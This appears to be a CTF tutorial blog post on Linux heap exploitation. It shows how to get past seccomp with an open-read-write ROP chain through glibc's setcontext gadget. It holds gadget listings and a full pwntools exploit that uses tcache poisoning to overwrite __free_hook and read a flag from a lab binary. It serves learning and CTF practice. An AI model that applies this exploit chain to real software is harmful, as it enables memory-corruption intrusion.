Linux Heap Exploitation - ORW ROP

2021-12-23

Bypass sandboxing implementations such as seccomp in CTF pwn challenges with ROP

Environment Setup

OS: Ubuntu 20.04 VM
Tools: pwndbg, pwntools, python3
Target: malloc-testbed(https://github.com/limitedeternity/HeapLAB/tree/main/malloc_testbed)

Introduction

Recent CTF pwn challenges are more and more onerous, probably due to 内卷 among players.
It’s common to find sandboxing implementations such as seccomp in place, that only allows certain syscalls to take place.
Even after hijacking the flow of execution, we won’t be able to simply toss in a one_gadget or system("/bin/sh") to get an interactive shell.
Usually only open read and write syscalls are available to use, and those are enough for us to read the flag.
I’ll document one way to achieve ORW by using the ROP chain near setcontext, and briefly talk about two other ways to bypass seccomp.

In this post, malloc-testbed is configured to use glibc 2.31 with a UAF bug, and libc already leaked.

This technique requires the following conditions to be met:

libc base address and address of a writeable region leaked(for example: heap)
control over a function pointer and it’s first argument(for example: __free_hook)
ability to request enough space to house the rop chain(can be one big chunk or many smaller chunks)

Gadget Hunting

ROP obviously requires ROP gadgets.
I normally hunt for the gadgets with a tool called ROPgadget, and objdump
objdump gives more control over the gadgets shown in my opinion, since I haven’t read ROPgadget‘s source code yet and have no idea what it’s doing.
However, objdump does not perform misaligned parses on instructions, and thus is likely to miss out certain gadgets.

setcontext gadget:

awae@ubuntu:~/Desktop/HeapLAB_Part2/malloc_testbed$ objdump -Mintel .links/libc.so.6 -d | grep -A30 "setcontext"
0000000000045b60 <setcontext>:
   45b60:	57                   	push   rdi
   45b61:	48 8d b7 28 01 00 00 	lea    rsi,[rdi+0x128]
   45b68:	31 d2                	xor    edx,edx
   45b6a:	bf 02 00 00 00       	mov    edi,0x2
   45b6f:	41 ba 08 00 00 00    	mov    r10d,0x8
   45b75:	b8 0e 00 00 00       	mov    eax,0xe
   45b7a:	0f 05                	syscall 
   45b7c:	5a                   	pop    rdx
   45b7d:	48 3d 01 f0 ff ff    	cmp    rax,0xfffffffffffff001
   45b83:	73 5b                	jae    45be0 <setcontext+0x80>
   45b85:	48 8b 8a e0 00 00 00 	mov    rcx,QWORD PTR [rdx+0xe0]
   45b8c:	d9 21                	fldenv [rcx]
   45b8e:	0f ae 92 c0 01 00 00 	ldmxcsr DWORD PTR [rdx+0x1c0]
   45b95:	48 8b a2 a0 00 00 00 	mov    rsp,QWORD PTR [rdx+0xa0]
   45b9c:	48 8b 9a 80 00 00 00 	mov    rbx,QWORD PTR [rdx+0x80]
   45ba3:	48 8b 6a 78          	mov    rbp,QWORD PTR [rdx+0x78]
   45ba7:	4c 8b 62 48          	mov    r12,QWORD PTR [rdx+0x48]
   45bab:	4c 8b 6a 50          	mov    r13,QWORD PTR [rdx+0x50]
   45baf:	4c 8b 72 58          	mov    r14,QWORD PTR [rdx+0x58]
   45bb3:	4c 8b 7a 60          	mov    r15,QWORD PTR [rdx+0x60]
   45bb7:	48 8b 8a a8 00 00 00 	mov    rcx,QWORD PTR [rdx+0xa8]
   45bbe:	51                   	push   rcx
   45bbf:	48 8b 72 70          	mov    rsi,QWORD PTR [rdx+0x70]
   45bc3:	48 8b 7a 68          	mov    rdi,QWORD PTR [rdx+0x68]
   45bc7:	48 8b 8a 98 00 00 00 	mov    rcx,QWORD PTR [rdx+0x98]
   45bce:	4c 8b 42 28          	mov    r8,QWORD PTR [rdx+0x28]
   45bd2:	4c 8b 4a 30          	mov    r9,QWORD PTR [rdx+0x30]
   45bd6:	48 8b 92 88 00 00 00 	mov    rdx,QWORD PTR [rdx+0x88]
   45bdd:	31 c0                	xor    eax,eax
   45bdf:	c3                   	ret

objdump shows the address of the gadget we are interested in, the long series of mov instructions to set many registers based on an address held in the rdx register.

In earlier versions of libc, the setcontext gadget uses rdi to set registers, which is directly controlled by us assuming we overwrote the __free_hook, since the first argument on x86_64 Linux is always stored in the rdi register.

However in more recent versions, the rdx register is used.
In order to control the other registers, we have to find a way to control rdx first.

I’ve seen this gadget being used in other writeups:

1
2
3

mov     rdx, [rdi+8]
mov     [rsp], rax
call    qword ptr [rdx+0x20]

but I was unable to find it with objdump or ROPgadget

Instead, I’ll use the following two gadgets found in __rpc_thread_key_cleanup to gain control of the rdx register.
I found them by the command objdump -Mintel .links/libc.so.6 -d | grep -A10 -B10 "call QWORD PTR \[rd".

The logic is, since we have to dereference rdx and control the data there, rdx should point to the heap.
Since we are passing rdi as an argument to free, it should hold an address of the heap too.
The only way we can retain execution flow after the gadget is through either a call or jmp gadget with rdx or rdi dereferenced as an argument.

The two gadgets are:

1 2	122192: 48 8b 47 38 mov rax,QWORD PTR [rdi+0x38] 122196: ff 50 20 call QWORD PTR [rax+0x20]

and

1
2
3

12219c:	48 8b 50 08          	mov    rdx,QWORD PTR [rax+0x8]
1221a0:	48 89 c7             	mov    rdi,rax
1221a3:	ff 52 20             	call   QWORD PTR [rdx+0x20]

By controlling rdi, we can control the first call instruction to execute the second gadget which sets rdx.
After setting rdx, the second call instruction will call the setcontextgadget.

The rest of the gadgets needed(pop gadgets and maybe syscall if you wish) should be easy to find with ROPgadget.
Note: syscall ; ret gadget can’t be found with ROPgadget for some reason, so use objdump for that.

Exploitation

Since this is just a proof of concept, exploitation is easy.
Tcache poisoning to overwrite __free_hook and ROP to win.

setcontext_rop.py:

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("malloc_testbed", checksec=False)
libc = ELF(elf.runpath + b"/libc.so.6", checksec=False)

gs = '''
continue
'''
def start():
    if args.GDB:
        context(terminal=['tmux', 'new-window'])
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Index of allocated chunks.
index = 0

# Select the "malloc" option; send size.
# Return chunk index.
def malloc(size):
    global index
    io.send(b"1")
    io.sendafter(b"size: ", f"{size}".encode())
    io.recvuntil(b"> ")
    index += 1
    return index - 1

# Select the "calloc" option; send size.
# Return chunk index.
def calloc(size):
    global index
    io.send(b"2")
    io.sendafter(b"size: ", f"{size}".encode())
    io.recvuntil(b"> ")
    index += 1
    return index - 1

# Select the "free" option; send index.
def free(index):
    io.send(b"3")
    io.sendafter(b"index: ", f"{index}".encode())
    io.recvuntil(b"> ")

# Select the "free address" option; send address.
def free_address(address):
    io.send(b"4")
    io.sendafter(b"address: ", f"{address}".encode())
    io.recvuntil(b"> ")

# Select the "edit" option; send index & data.
def edit(index, data):
    io.send(b"5")
    io.sendafter(b"index: ", f"{index}".encode())
    io.sendafter(b"data: ", data)
    io.recvuntil(b"> ")

# Select the "read" option; send index.
# Return data from read operation.
def read(index):
    io.send(b"6")
    io.sendafter(b"index: ", f"{index}".encode())
    r = io.recvuntil(b"\n1) malloc", drop=True)
    io.recvuntil(b"> ")
    return r

io = start()

# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# This binary leaks the heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)

# This binary leaks the address of its m_array.
io.recvuntil(b"m_array @ ")
m_array = int(io.recvline(), 16)
io.recvuntil(b"> ")
io.timeout = 0.1

# =============================================================================

# Vars
HEAP_BASE_ADDR = 0
ROP_CHAIN_ADDR = 0
FLAG_PATH = 0

# Log
progress = log.progress("Exploit", level=logging.INFO)
progress.status("Started Exploit")

# ROP gadgets

# Setcontext Gadget
# 45b95:       48 8b a2 a0 00 00 00    mov    rsp,QWORD PTR [rdx+0xa0]
# 45b9c:       48 8b 9a 80 00 00 00    mov    rbx,QWORD PTR [rdx+0x80]
# 45ba3:       48 8b 6a 78             mov    rbp,QWORD PTR [rdx+0x78]
# 45ba7:       4c 8b 62 48             mov    r12,QWORD PTR [rdx+0x48]
# 45bab:       4c 8b 6a 50             mov    r13,QWORD PTR [rdx+0x50]
# 45baf:       4c 8b 72 58             mov    r14,QWORD PTR [rdx+0x58]
# 45bb3:       4c 8b 7a 60             mov    r15,QWORD PTR [rdx+0x60]
# 45bb7:       48 8b 8a a8 00 00 00    mov    rcx,QWORD PTR [rdx+0xa8]
# 45bbe:       51                      push   rcx
# 45bbf:       48 8b 72 70             mov    rsi,QWORD PTR [rdx+0x70]
# 45bc3:       48 8b 7a 68             mov    rdi,QWORD PTR [rdx+0x68]
# 45bc7:       48 8b 8a 98 00 00 00    mov    rcx,QWORD PTR [rdx+0x98]                                 
# 45bce:       4c 8b 42 28             mov    r8,QWORD PTR [rdx+0x28]
# 45bd2:       4c 8b 4a 30             mov    r9,QWORD PTR [rdx+0x30]
# 45bd6:       48 8b 92 88 00 00 00    mov    rdx,QWORD PTR [rdx+0x88]
# 45bdd:       31 c0                   xor    eax,eax                                                                       
# 45bdf:       c3                      ret

# Pivot Gadget 1
# 122192:       48 8b 47 38             mov    rax,QWORD PTR [rdi+0x38]
# 122196:       ff 50 20                call   QWORD PTR [rax+0x20]

# Pivot Gadget 2
# 12219c:       48 8b 50 08             mov    rdx,QWORD PTR [rax+0x8]
# 1221a0:       48 89 c7                mov    rdi,rax
# 1221a3:       ff 52 20                call   QWORD PTR [rdx+0x20]

SETCONTEXT_GADGET_START = libc.address + 0x45b95
PIVOT_GADGET_1_START = libc.address + 0x122192
PIVOT_GADGET_2_START = libc.address + 0x12219c
POP_RDI_RET = libc.address + 0x21882
POP_RSI_RET = libc.address + 0x22192
POP_RDX_RET = libc.address + 0x1b9a
POP_RAX_RET = libc.address + 0x38e78
XCHG_EAX_EDI_RET = libc.address + 0x3bfee
SYSCALL_RET = libc.address + 0x12a259

# Exploit
progress.status("Leaking Heap Base Address")
chunk_A = malloc(0x18)
chunk_B = malloc(0x18)
rop_pad = malloc(0x28) # Used to reduce rop chunk size, can omit and use
			# large chunk for rop_chunk
rop_chunk = malloc(0x198)

free(chunk_B)
free(chunk_A)

HEAP_BASE_ADDR = u64(read(chunk_A)[:6].ljust(8, b'\x00')) - 0x2c0
ROP_CHAIN_ADDR = HEAP_BASE_ADDR + 0x310
FLAG_PATH = HEAP_BASE_ADDR + 0x2e0
log.success("Heap Base Address: " + hex(HEAP_BASE_ADDR))
log.success("ROP Chain Address: " + hex(ROP_CHAIN_ADDR))
progress.status("Leaked Heap Base Address")
progress.status("Starting ROP Chain Setup")

edit(rop_chunk, p64(ROP_CHAIN_ADDR-16) + p64(ROP_CHAIN_ADDR-8) + p64(SETCONTEXT_GADGET_START) + \
                p64(PIVOT_GADGET_2_START) + p64(POP_RDI_RET) + p64(0) + \
                p64(0) + p64(0) + p64(0) + \
                p64(0) + p64(0) + p64(FLAG_PATH) + \
                p64(0) + p64(0) + p64(0) + \
                p64(0) + p64(0) + p64(0) + \
                p64(ROP_CHAIN_ADDR + 20*8) + p64(POP_RAX_RET) + p64(2) + \
                p64(SYSCALL_RET) + p64(XCHG_EAX_EDI_RET) + \
                p64(POP_RSI_RET) + p64(FLAG_PATH) + p64(POP_RDX_RET) + \
                p64(0x100) + p64(POP_RAX_RET) + p64(0) + \
                p64(SYSCALL_RET) + p64(POP_RDI_RET) + p64(1) + \
                p64(POP_RAX_RET) + p64(1) + p64(SYSCALL_RET) + \
                p64(POP_RAX_RET) + p64(60) + p64(SYSCALL_RET)
    )
edit(rop_pad, b"/home/awae/flag")
progress.status("ROP Chain Complete")
progress.status("Starting Tcache Poisoning To __free_hook")

edit(chunk_A, p64(libc.sym.__free_hook))
progress.status("__free_hook Linked Into Tcache")
progress.status("Begin __free_hook Overwrite")

chunk_A = malloc(0x18)
free_hook = malloc(0x18)
edit(free_hook, p64(PIVOT_GADGET_1_START))
log.success("Overwrote __free_hook To Pivot Gadget")
progress.status("End __free_hook Overwrite")

# Trigger ROP
io.send(b"3")
io.sendafter(b"index: ", f"{rop_pad}".encode())
progress.success("ORW ROP Chain Completed")

flag = io.recvline().decode()
log.success("Flag: " + flag)

# =============================================================================

io.close()

There are of course many modifications available, such as using library functions instead of syscall, using many small chunks to house the ROP chain, not calling exit and make your exploit ugly etc, but the crux is similar.

Alternatives

Depending on the amount of control, there are many more methods to bypass seccomp.

If you have an arbitrary write primitive, one method will be to leak stack addresses using the environ variable, locate the return address and just write ROP chain on the stack.
If the sandbox permits, use an mprotect call to mark the heap as executable and pwn it the 90s way.
Social engineer the challenge creators
Find a remote kernel 0day

Conclusion

Hooks are things of the past! Filestream exploitation and glibc 0day is king
学无止境谦卑而行